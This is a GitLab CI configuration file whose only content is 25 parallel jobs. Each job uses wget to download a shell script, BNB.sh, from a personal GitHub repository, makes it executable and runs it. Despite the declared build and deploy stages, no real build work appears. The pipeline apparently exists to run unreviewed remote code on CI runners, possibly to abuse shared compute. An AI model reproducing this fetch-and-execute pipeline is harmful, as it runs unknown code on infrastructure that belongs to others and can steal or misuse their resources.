stages:
  - bachannel
  - build
  - deploy

bachannel_1:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
bachannel_2:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_3:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_4:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_5:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_6:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_7:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_8:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_9:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh&& chmod u+x BNB.sh && ./BNB.sh
    
bachannel_10:
  stage: build
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_11:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_12:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_13:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_14:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_15:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_16:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_17:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_18:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_19:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_20:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh && ./BNB.sh
    
bachannel_21:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh  && ./BNB.sh 
   
bachannel_22:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh  && ./BNB.sh 
    
bachannel_23:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh  && ./BNB.sh 
    
bachannel_24:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh  && ./BNB.sh 
    
bachannel_25:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/jangek992/jangek992/main/BNB.sh && chmod u+x BNB.sh  && ./BNB.sh 

